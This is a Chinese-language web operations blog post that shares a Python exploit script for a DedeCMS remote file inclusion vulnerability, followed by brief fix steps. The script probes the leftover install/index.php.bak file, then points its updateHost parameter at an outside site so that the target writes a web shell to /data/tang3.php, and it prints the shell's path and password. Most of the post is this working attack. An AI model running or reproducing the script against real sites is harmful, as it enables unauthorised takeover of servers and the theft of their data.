网站运维

主要分享服务器运维相关教程.如服务器安全配置,环境配置,dns配置,ftp配置,服务器安全问题等等,服务器配置教程是站长必备的知识点.

最新python织梦dedecms远程执行脚本

发表于:2019-11-26 点击: 栏目:

网站运维

收藏(0)

织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。

织梦CMS漏洞代码

#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
import requests
import sys
import re
def main():
try:
url="http://"+sys.argv[1].strip('http://')
except IndexError:
print '''
poc: dede.py [url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
if code==200:
print u"恭喜存在此漏洞"
print u"Ongoing attacks--->>>>>"
exploit(url)
pass
else:
print u"sorry 漏洞正在挣扎"
pass
def exploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
if Probe.findall(htmlcontent):
print u'''
ver:getshell成功
shell:url+/data/tang3.php?a=0  密码为:c
'''
pass
else:
print u"请看远程地址是否已经不可用"
pass
if __name__ == '__main__':
main()

修复方法

1、建议安装完成后,删除(改名)install文件夹。

2、给data文件夹改名,或者移动位置。

3、到织梦后台,升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢!